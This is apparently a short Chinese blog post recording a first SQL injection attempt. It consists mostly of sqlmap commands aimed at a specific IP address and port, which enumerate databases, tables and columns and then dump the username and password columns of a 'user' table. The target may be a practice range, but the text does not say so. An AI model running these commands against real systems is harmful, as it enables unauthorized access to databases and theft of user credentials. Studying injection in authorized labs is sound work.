第一次SQL注入

 

 1.在sqlmap文件安装目录下输入打开cmd，输入：

sqlmap.py

 

 

 

 

 2.   

 

sqlmap.py -u url（url：目标地址）

sqlmap.py -u http://59.63.200.79:6453/single.php?id=1 –dbs

sqlmap.py -u http://59.63.200.79:6453/single.php?id=1 -D cake –tables

3.

输入：

 

 

 

sqlmap.py -u http://59.63.200.79:6453/single.php?id=1 -D cake -T user –columns

得到如下信息：

 

 输入：

sqlmap.py -u http://59.63.200.79:6453/single.php?id=1 -D cake -T user -C username,passwd –dump

得到如下信息：

 

 

 

 结束。

 

第一次SQL注入

标签：code   tab   注入   use   pre   ble   php   name   bsp